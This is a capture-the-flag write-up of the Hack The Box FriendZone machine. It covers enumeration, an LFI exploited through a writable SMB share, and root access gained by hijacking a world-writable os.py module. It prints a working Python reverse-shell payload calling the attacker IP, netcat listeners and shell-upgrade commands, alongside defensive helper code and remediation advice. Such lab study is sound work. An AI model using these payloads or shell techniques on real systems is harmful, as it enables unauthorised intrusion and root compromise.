Hack The Box: FriendZone Writeup w/o Metasploit

This is the 14th blog out of a series of blogs I will be publishing on retired HTB machines in preparation for the OSCP. The full list of OSCP like machines compiled by TJ_Null can be found here.

Let’s get started!

Reconnaissance

First thing first, we run a quick initial nmap scan to see which ports are open and which services are running on those ports.

nmap -sC -sV -O -oA initial 10.10.10.123
  • -sC: run default nmap scripts
  • -sV: detect service version
  • -O: detect OS
  • -oA: output all formats and store in file initial

We get back the following result showing that seven ports are open:

  • Port 21: running ftp vsftpd 3.0.3
  • Port 22: running OpenSSH 7.6p1 Ubuntu 4
  • Port 53: running ISC BIND 9.11.3–1ubuntu1.2 (DNS)
  • Ports 80 & 443: running Apache httpd 2.4.29
  • Ports 139 and 445: Samba smbd 4.7.6-Ubuntu

Starting Nmap 7.70 ( https://nmap.org ) at 2019-11-15 21:19 EST
Nmap scan report for 10.10.10.123
Host is up (0.030s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a9:68:24:bc:97:1f:1e:54:a5:80:45:e7:4c:d9:aa:a0 (RSA)
| 256 e5:44:01:46:ee:7a:bb:7c:e9:1a:cb:14:99:9e:2b:8e (ECDSA)
|_ 256 00:4e:1a:4f:33:e8:a0:de:86:a6:e4:2a:5f:84:61:2b (ED25519)
53/tcp open domain ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.11.3-1ubuntu1.2-Ubuntu
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Friend Zone Escape software
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open ssl/http Apache httpd 2.4.29
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 404 Not Found
| ssl-cert: Subject: commonName=friendzone.red/organizationName=CODERED/stateOrProvinceName=CODERED/countryName=JO
| Not valid before: 2018-10-05T21:02:30
|_Not valid after: 2018-11-04T21:02:30
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
| http/1.1
...........
|_ http/1.1
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.70%E=4%D=11/15%OT=21%CT=1%CU=40251%PV=Y%DS=2%DC=I%G=Y%TM=5DCF5C
OS:FC%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=104%TI=Z%CI=I%II=I%TS=A)OP
OS:S(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST
OS:11NW7%O6=M54DST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)EC
OS:N(R=Y%DF=Y%T=40%W=7210%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=
OS:AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(
OS:R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%
OS:F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N
OS:%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%C
OS:D=S)
Network Distance: 2 hops
Service Info: Hosts: FRIENDZONE, 127.0.1.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -48m45s, deviation: 1h09m16s, median: -8m46s
|_nbstat: NetBIOS name: FRIENDZONE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: friendzone
| NetBIOS computer name: FRIENDZONE\x00
| Domain name: \x00
| FQDN: friendzone
|_ System time: 2019-11-16T04:11:17+02:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2019-11-15 21:11:17
|_ start_date: N/A

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 68.10 seconds

Before we start investigating these ports, let’s run more comprehensive nmap scans in the background to make sure we cover all bases.

Let’s run an nmap scan that covers all ports.

nmap -sC -sV -O -p- -oA full 10.10.10.123

We get back the following result. No other ports are open.

Starting Nmap 7.70 ( https://nmap.org ) at 2019-11-15 21:26 EST
Nmap scan report for 10.10.10.123
Host is up (0.030s latency).
Not shown: 65528 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a9:68:24:bc:97:1f:1e:54:a5:80:45:e7:4c:d9:aa:a0 (RSA)
| 256 e5:44:01:46:ee:7a:bb:7c:e9:1a:cb:14:99:9e:2b:8e (ECDSA)
|_ 256 00:4e:1a:4f:33:e8:a0:de:86:a6:e4:2a:5f:84:61:2b (ED25519)
53/tcp open domain ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.11.3-1ubuntu1.2-Ubuntu
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Friend Zone Escape software
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open ssl/http Apache httpd 2.4.29
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 404 Not Found
| ssl-cert: Subject: commonName=friendzone.red/organizationName=CODERED/stateOrProvinceName=CODERED/countryName=JO
| Not valid before: 2018-10-05T21:02:30
|_Not valid after: 2018-11-04T21:02:30
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
| http/1.1
..........
|_ http/1.1
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.70%E=4%D=11/15%OT=21%CT=1%CU=31322%PV=Y%DS=2%DC=I%G=Y%TM=5DCF5E
OS:C4%P=x86_64-pc-linux-gnu)SEQ(SP=FB%GCD=1%ISR=102%TI=Z%CI=I%II=I%TS=A)SEQ
OS:(SP=FB%GCD=1%ISR=102%TI=Z%CI=I%TS=A)OPS(O1=M54DST11NW7%O2=M54DST11NW7%O3
OS:=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST11NW7%O6=M54DST11)WIN(W1=7120%W2=7
OS:120%W3=7120%W4=7120%W5=7120%W6=7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M54DNNSNW
OS:7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF
OS:=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=
OS:%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=
OS:0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RI
OS:PCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 2 hops
Service Info: Hosts: FRIENDZONE, 127.0.1.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -48m45s, deviation: 1h09m16s, median: -8m46s
|_nbstat: NetBIOS name: FRIENDZONE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: friendzone
| NetBIOS computer name: FRIENDZONE\x00
| Domain name: \x00
| FQDN: friendzone
|_ System time: 2019-11-16T04:18:54+02:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2019-11-15 21:18:54
|_ start_date: N/A

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 119.93 seconds

Similarly, we run an nmap scan with the -sU flag enabled to run a UDP scan.

nmap -sU -O -p- -oA udp 10.10.10.123

The full UDP scan still had not finished by the time I had rooted the box and written this blog, so instead I ran a scan of the top 1000 ports.

Two ports are open.

  • Port 53: running DNS
  • Port 137: running SMB

Before we move on to enumeration, let’s make a few mental notes about the nmap scan results.

  • The -sC flag checks for anonymous login when it encounters an FTP port. Since the output did not report that anonymous login is allowed, it’s likely that we’ll need credentials to access the FTP server. Moreover, the version is 3.0.3 which does not have any critical exploits (most FTP exploits are for version 2.x). So FTP is very unlikely to be our point of entry.
  • Similar to FTP, there aren’t many critical exploits associated with the version of SSH that is being used, so we’ll need credentials for this service as well.
  • Port 53 is open. The first thing we need to do for this service is get the domain name through nslookup and attempt a zone transfer to enumerate name servers, hostnames, etc. The ssl-cert from the nmap scan gives us the common name friendzone.red. This could be our domain name.
  • Ports 80 and 443 show different page titles. This could be a virtual hosts routing configuration. This means that if we discover other hosts we need to enumerate them over both HTTP and HTTPS since we might get different results.
  • SMB ports are open. We need to do the usual tasks: check for anonymous login, list shares and check permissions on shares.
  • We have so many services to enumerate!

Enumeration

I always start off with enumerating HTTP first. In this case both 80 and 443 are open so we’ll start there.

Ports 80 & 443

Visit the site on the browser.

We can see the email is info@friendzoneportal.red. The friendzoneportal.red could be a possible domain name. We’ll keep it in mind when enumerating DNS.

View the source code to see if we can find any other information.

Nope. Next, run gobuster to enumerate directories.

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 10.10.10.123

We get back the following result.

The /wordpress directory doesn’t reference any other links. So I ran gobuster on the /wordpress directory as well and didn’t get anything useful.

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 10.10.10.123/wordpress

Visiting the site over HTTPS (port 443) gives us an error.

Therefore, let’s move on to enumerating DNS.

Port 53

Try to get a domain name for the IP address using nslookup.

nslookup
server 10.10.10.123
10.10.10.123

We don’t get anything. However, we do have two possible domains from previous enumeration steps:

  • friendzone.red from the nmap scan, and
  • friendzoneportal.red from the HTTP website

Let’s try a zone transfer on both domains.

# zone transfer command: host -l <domain-name> <dns_server-address>
host -l friendzone.red 10.10.10.123 > zonetransfer.txt
host -l friendzoneportal.red 10.10.10.123 >> zonetransfer.txt

Open the zonetransfer.txt file to see if we got any subdomains.

Add all the domains/subdomains to the /etc/hosts file.

10.10.10.123 friendzone.red friendzoneportal.red admin.friendzoneportal.red files.friendzoneportal.red imports.friendzoneportal.red vpn.friendzoneportal.red administrator1.friendzone.red hr.friendzone.red uploads.friendzone.red
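
Building that /etc/hosts line by hand from zonetransfer.txt is error-prone, so here is an added Python helper (not part of the original writeup) that parses `host -l` output and emits the line. SAMPLE_ZONE_TRANSFER is a constructed stand-in for what `host -l <domain> <server>` prints: the hostnames are ones the writeup found, the 127.0.0.1 addresses are placeholders. From the defender's side, the fact that the AXFR succeeds from an arbitrary client is the finding itself; BIND's allow-transfer directive is where the trusted secondaries are listed.

```python
"""Turn `host -l` (zone transfer) output into a single /etc/hosts line.

Added helper, not part of the original writeup. SAMPLE_ZONE_TRANSFER is a
constructed stand-in for `host -l <domain> <server>` output; hostnames are the
ones from the writeup, the addresses are placeholders.
"""
import re

SAMPLE_ZONE_TRANSFER = """\
Using domain server:
Name: 10.10.10.123
Address: 10.10.10.123#53
Aliases:

friendzone.red name server localhost.
friendzone.red has address 127.0.0.1
administrator1.friendzone.red has address 127.0.0.1
hr.friendzone.red has address 127.0.0.1
uploads.friendzone.red has address 127.0.0.1
friendzoneportal.red name server localhost.
admin.friendzoneportal.red has address 127.0.0.1
files.friendzoneportal.red has address 127.0.0.1
"""

# `host -l` prints one "<name> has address <ipv4>" line per A record.
A_RECORD_RE = re.compile(
    r"^(?P<name>[A-Za-z0-9.-]+)\s+has address\s+(?P<ip>\d{1,3}(?:\.\d{1,3}){3})$"
)


def parse_host_l(output):
    """Return the unique hostnames that carry A records, in the order the server sent them."""
    names = []
    for line in output.splitlines():
        match = A_RECORD_RE.match(line.strip())
        if match is None:
            continue  # header lines, "name server" lines and blanks are skipped
        name = match.group("name").rstrip(".").lower()
        if name not in names:
            names.append(name)
    return names


def hosts_line(target_ip, hostnames):
    """One /etc/hosts entry mapping every discovered name to the target address."""
    return " ".join([target_ip] + list(hostnames))


if __name__ == "__main__":
    found = parse_host_l(SAMPLE_ZONE_TRANSFER)
    print(hosts_line("10.10.10.123", found))
```

Feed it the real zonetransfer.txt with `parse_host_l(open("zonetransfer.txt").read())`; a server that refuses the transfer yields no A-record lines and the function returns an empty list.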

Now we start visiting the subdomains we found. Remember that we have to visit them over both HTTP and HTTPS because we’re likely to get different results.

The following sites showed us particularly interesting results.

  • https://admin.friendzoneportal.red/ and https://administrator1.friendzone.red/ have login forms.
  • https://uploads.friendzone.red/ allows you to upload images.

I tried default credentials on the admin sites but that didn’t work. Before we run a password cracker on those two sites, let’s enumerate SMB. We might find credentials there.

Ports 139 & 445

Run smbmap to list available shares and permissions.

smbmap -H 10.10.10.123
  • -H: host

We get back the following result.

We have READ access on the general share and READ/WRITE access on the Development share. List the content of the shares.

smbmap -R -H 10.10.10.123
  • -R: Recursively list directories and files on all accessible shares

The Development share does not contain anything, but the general directory has a file named creds.txt! Before we download the file, let’s use smbclient to view more information about the shares.

smbclient -L //10.10.10.123
  • -L: look at what services are available on a server

The extra information this gives us over smbmap is the Comment column. We can see that the files in the Files share are stored in /etc/Files on the system. Therefore, there’s a good possibility that the files stored in the Development share (which we have WRITE access to) are stored in /etc/Development. We might need this piece of information in the exploitation phase.

Let’s get the creds.txt file. First, login anonymously (without a password) into the general share.

smbclient //10.10.10.123/general -N
  • -N: suppresses the normal password prompt from the client to the user

Download the creds.txt file from the target machine to the attack machine.

get creds.txt

View the content of the file.

cat creds.txt

We have admin credentials!

creds for the admin THING:admin:WORKWORKHhallelujah@#

Try the credentials on FTP.

Doesn’t work. Next, try SSH.

Also doesn’t work. Next, try it on the https://admin.friendzoneportal.red/ login form we found.

Also doesn’t work. Next, try the credentials on the https://administrator1.friendzone.red/ login form.

We’re in! Visit the /dashboard.php page.

It seems to be a page that allows you to view images on the site. We’ll try to gain initial access through this page.

Gaining an Initial Foothold

The dashboard.php page gives us instructions on how to view an image. We need to append the following to the URL.

?image_id=a.jpg&pagename=timestamp

Let’s put that timestamp number in the pagename URL parameter. After we do that we no longer get a “Final Access timestamp…” message.

During our enumeration phase, we found a URL https://uploads.friendzone.red/ that allows us to upload images. Let’s try and see if the images we upload there can be viewed through the dashboard page.

When we successfully upload the image random.jpg we get a timestamp. Let’s use the image and timestamp on the dashboard page.

https://administrator1.friendzone.red/dashboard.php?image_id=random.jpg&pagename=1573957506

Nope, it doesn’t find the image. Let’s move our focus to the pagename parameter. It seems to be running a timestamp script that generates a timestamp and outputs it on the page. Based on the way the application is currently working, my gut feeling is that it takes the filename “timestamp” and appends “.php” to it and then runs that script. Therefore, if this is vulnerable to LFI, it would be difficult to disclose sensitive files since the “.php” extension will get added to my query.
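
The writeup never shows the PHP behind dashboard.php, so as an added example (not code from the box or the original post) the Python below models the inferred behaviour: vulnerable_resolve() is the “append .php and include whatever was supplied” logic the gut feeling describes, hardened_resolve() is the allow-list plus path-confinement fix, and flag_pagename_requests() is the detection side, pulling out-of-policy pagename values out of access-log lines. WEB_ROOT, ALLOWED_PAGES and the log lines are constructed assumptions.

```python
"""Model of the dashboard's pagename handling: inferred vulnerable resolver,
a hardened resolver, and a log check for out-of-policy values.

Added example, not code from the FriendZone box. WEB_ROOT, ALLOWED_PAGES and
SAMPLE_ACCESS_LOG are constructed assumptions.
"""
import posixpath
import re
from urllib.parse import parse_qs, urlsplit

WEB_ROOT = "/var/www/admin"      # assumed document root of the admin vhost
ALLOWED_PAGES = {"timestamp"}    # assumed: the only page script the dashboard should include


class PageNotAllowed(ValueError):
    """Raised when a pagename value is rejected."""


def vulnerable_resolve(pagename):
    """Inferred original behaviour: attacker-controlled value + '.php', no checks.

    An absolute path such as /etc/Development/test therefore resolves to a file
    written through the writable SMB share.
    """
    return pagename + ".php"


def hardened_resolve(pagename, web_root=WEB_ROOT, allowed=ALLOWED_PAGES):
    """Allow-list the name, then confine the resolved path to the web root."""
    if pagename not in allowed:
        raise PageNotAllowed("pagename %r is not an allowed page" % pagename)
    candidate = posixpath.normpath(posixpath.join(web_root, pagename + ".php"))
    # Defence in depth: even an allow-listed value must not escape web_root.
    if posixpath.commonpath([web_root, candidate]) != web_root:
        raise PageNotAllowed("pagename %r escapes the web root" % pagename)
    return candidate


# Constructed Apache-style access log lines (not real logs from the box).
SAMPLE_ACCESS_LOG = [
    '10.10.14.6 - - [16/Nov/2019:04:30:00 +0200] "GET /dashboard.php?image_id=a.jpg&pagename=timestamp HTTP/1.1" 200 512',
    '10.10.14.6 - - [16/Nov/2019:04:31:10 +0200] "GET /dashboard.php?image_id=a.jpg&pagename=/etc/Development/test HTTP/1.1" 200 520',
    '10.10.14.6 - - [16/Nov/2019:04:32:45 +0200] "GET /dashboard.php?image_id=a.jpg&pagename=/etc/Development/php-reverse-shell HTTP/1.1" 200 0',
    '10.10.14.6 - - [16/Nov/2019:04:33:00 +0200] "GET /login.php HTTP/1.1" 200 300',
]

REQUEST_RE = re.compile(r'"(?:GET|POST) (?P<target>\S+) HTTP/')


def flag_pagename_requests(log_lines, allowed=ALLOWED_PAGES):
    """Detection side: return every pagename value in the log that is not allow-listed."""
    flagged = []
    for line in log_lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        query = parse_qs(urlsplit(match.group("target")).query)
        for value in query.get("pagename", []):
            if value not in allowed:
                flagged.append(value)
    return flagged


if __name__ == "__main__":
    print(vulnerable_resolve("/etc/Development/test"))
    print(hardened_resolve("timestamp"))
    print(flag_pagename_requests(SAMPLE_ACCESS_LOG))
```

The allow-list alone closes the hole; the commonpath check is there so that a later change to the allow-list (say, adding a name with a slash in it) cannot quietly reopen it.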

Instead, let’s try first uploading a php file and then exploiting the LFI vulnerability to output something on the page. During the enumeration phase, we found that we have READ and WRITE permissions on the Development share and that it’s likely that the files uploaded on that share are stored in the location /etc/Development (based on the Comments column).

Let’s create a simple test.php script that outputs the string “It’s working!” on the page.

<?php
echo "It's working!";
?>

Log into the Development share.

smbclient //10.10.10.123/Development -N

Upload the test.php file from the attack machine to the share.

put test.php

Test it on the site.

https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=/etc/Development/test

Remember not to include the .php extension since the application already does that for you.

Perfect, it’s working! The next step is to upload a php reverse shell. Grab the reverse shell from pentestmonkey and change the IP address and port configuration.

Upload it in the same manner as we did with the test.php file. Then set up a listener on the attack machine.

nc -nlvp 1234

Execute the reverse shell script from the website.

https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=/etc/Development/php-reverse-shell

We have a shell!

Let’s upgrade it to a better shell.

python -c 'import pty; pty.spawn("/bin/bash")'

This gives us a partially interactive bash shell. To get a fully interactive shell, background the session (CTRL+Z) and run the following in your terminal, which tells your terminal to pass keyboard shortcuts to the shell.

stty raw -echo

Once that is done, run the command “fg” to bring netcat back to the foreground. Then use the following command to give the shell the ability to clear the screen.

export TERM=xterm

Now that we have an interactive shell, let’s see if we have enough privileges to get the user.txt flag.

cat home/friend/user.txt

We need to escalate privileges to get the root flag.

Privilege Escalation

We have rwx privileges on the /etc/Development directory as www-data. So let’s upload the LinEnum script to the Development share.

put LinEnum.sh

On the target machine, navigate to the /etc/Development directory.

cd /etc/Development/

Give the script execute permissions.

chmod +x LinEnum.sh

I don’t seem to have execute permissions in that directory, so I’ll copy it to the tmp directory.

cp LinEnum.sh /tmp/

Navigate to the /tmp directory and try again.

cd /tmp/
chmod +x LinEnum.sh

That works, so the next step is to execute the script.

./LinEnum.sh

The results from LinEnum don’t give us anything that we could use to escalate privileges. So let’s try pspy. If you don’t have the script, you can download it from the following github repository.

https://github.com/DominicBreuker/pspy

Upload it and run it on the target machine in the same way we did for LinEnum.

After a minute or two we see an interesting process pop up.

It seems that the reporter.py script is getting executed every couple of minutes as a scheduled task. Let’s view the permissions we have on that file.

ls -la /opt/server_admin/

We only have read permission. So let’s view the content of the file.

cat /opt/server_admin/reporter.py

Here’s the source code of the script.

#!/usr/bin/python

import os

to_address = "admin1@friendzone.com"
from_address = "admin2@friendzone.com"

print "[+] Trying to send email to %s"%to_address

#command = ''' mailsend -to admin2@friendzone.com -from admin1@friendzone.com -ssl -port 465 -auth -smtp smtp.gmail.co-sub scheduled results email +cc +bc -v -user you -pass "PAPAP"'''

#os.system(command)

# I need to edit the script later
# Sam ~ python developer

Most of the script is commented out so there isn’t much to do there. It does import the os module. Maybe we can hijack that. Locate the module on the machine.

locate os.py

Navigate to the directory and view the permissions on the file.

cd /usr/lib/python2.7
ls -la | grep os.py

We have rwx privileges on the os.py module! This is obviously a security misconfiguration. As a non-privileged user, I should only have read access to the script. If we add a reverse shell to the script and wait for the root owned scheduled task to run, we’ll get back a reverse shell with root privileges!
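
The writeup finds the writable os.py by eye with ls -la. As an added example (not from the original post), the Python below is the check an administrator could run over sys.path to catch this class of misconfiguration: it reports every import-path directory, and every .py module inside one, that group or world can write to. On this box, pointed at sys.path of the Python 2.7 interpreter, it would list /usr/lib/python2.7/os.py; the demo() function builds a throwaway directory with one 0777 module so the check runs anywhere without touching the real interpreter.

```python
"""Report import-path directories and .py modules that non-owners can write.

Added example, not from the writeup. demo() builds a temporary directory
with a constructed world-writable module so the check can run offline;
on a real host call check_import_path(sys.path).
"""
import os
import stat
import sys
import tempfile


def writable_by_others(path):
    """True if group or world has write permission (the os.py mode on this box)."""
    mode = os.stat(path).st_mode          # stat, not lstat: judge the real file, not a symlink
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def check_import_path(paths):
    """Return sorted (path, kind) findings; kind is 'dir' or 'file'.

    A writable directory matters as much as a writable module: anyone who can
    drop a new os.py (or os.pyc) earlier on the path gets the same hijack.
    """
    findings = []
    for entry in paths:
        if not entry or not os.path.isdir(entry):
            continue  # empty string means cwd; zip imports and missing dirs are skipped
        if writable_by_others(entry):
            findings.append((entry, "dir"))
        for name in os.listdir(entry):
            full = os.path.join(entry, name)
            if os.path.isfile(full) and name.endswith(".py") and writable_by_others(full):
                findings.append((full, "file"))
    return sorted(findings)


def demo():
    """Constructed scenario: one sane module, one 0777 module, in a 0755 directory."""
    root = tempfile.mkdtemp(prefix="modcheck-")
    good = os.path.join(root, "good.py")
    bad = os.path.join(root, "os.py")     # stand-in for the misconfigured module
    for path in (good, bad):
        with open(path, "w") as handle:
            handle.write("# placeholder module\n")
    os.chmod(root, 0o755)
    os.chmod(good, 0o644)
    os.chmod(bad, 0o777)
    return check_import_path([root]), bad


if __name__ == "__main__":
    for path, kind in check_import_path(sys.path):
        print("%s %s is writable by group or world" % (kind, path))
```

The remediation on the box is the one the writeup implies: restore the default mode on the module (chmod 644) and keep the interpreter's library directories owned by root and writable only by root.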

I tried accessing the os.py script using vi but the terminal was a bit screwed up. Here’s a way to fix it (courtesy of ippsec).

Go to a new pane in the attack machine and enter the following command.

stty -a

We need to set the rows to 29 and the columns to 113. Go back to the netcat session and run the following command.

stty rows 29 columns 113

Even after this, vi was still a bit glitchy, so instead, I decided to download the os.py module to my attack machine using SMB, add the reverse shell there and upload it back to the target machine.

Add the following reverse shell code to the bottom of the os.py file and upload it back to the target machine.

# appended to the end of os.py, so dup2 is already in scope (os.py itself defines it)
import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("10.10.14.6",1233));  # attack machine address and listener port
dup2(s.fileno(),0);
dup2(s.fileno(),1);
dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);

Set up a listener on the attack machine.

nc -nlvp 1233

Wait for the scheduled task to run the reporter.py script that will in turn call the os.py module which contains our reverse shell code.

We get back a shell running with root privileges! Grab the root.txt flag.

Lessons Learned

To gain an initial foothold on the box we exploited six vulnerabilities.

  • The ability to perform a zone transfer, which allowed us to get a list of all hosts for the domain. To prevent this vulnerability from occurring, the DNS server should be configured to only allow zone transfers from trusted IP addresses. It is worth noting that even if zone transfers are not allowed, it is still possible to enumerate the list of hosts through other (not so easy) means.
  • Enabling anonymous login to an SMB share that contained sensitive information. This could have been avoided by disabling anonymous / guest access on SMB shares.
  • As if anonymous login was not bad enough, one of the SMB shares also had WRITE access on it. This allowed us to upload a reverse shell. Again, restrictions should have been put in place on the SMB shares preventing access.
  • Saving credentials in plaintext in a file on the system. This is unfortunately very common. Use a password manager if you’re having difficulty remembering your passwords.
  • A Local File Inclusion (LFI) vulnerability that allowed us to execute a file on the system. Possible remediations include maintaining a white list of allowed files, sanitizing input, etc.
  • A security misconfiguration that gave the web daemon user (www-data) the same permissions as a regular user on the system. I shouldn’t have been able to access the user.txt flag while running as the www-data user. The system administrator should have conformed to the principle of least privilege and the concept of separation of privileges.

To escalate privileges we exploited one vulnerability.

  • A security misconfiguration of a python module. There was a scheduled task that was run by root. The scheduled task ran a script that imported the os.py module. Usually, a regular user should only have read access to such modules, however it was configured as rwx access for everyone. Therefore, we used that to our advantage to hijack the python module and include a reverse shell that eventually ran with root privileges. It is common that such a vulnerability is introduced into a system when a user creates their own module and forgets to restrict write access to it, or when the user decides to lessen restrictions on an existing Python module. For this machine, we encountered the latter. The developer should have been very careful when deciding to change the default configuration of this specific module.

Conclusion

14 machines down, 33 more to go (if you’re wondering why the number of machines increased, it’s because TJ_Null recently updated the list)!

Translated from: https://medium.com/swlh/hack-the-box-friendzone-writeup-w-o-metasploit-fb52adc73c96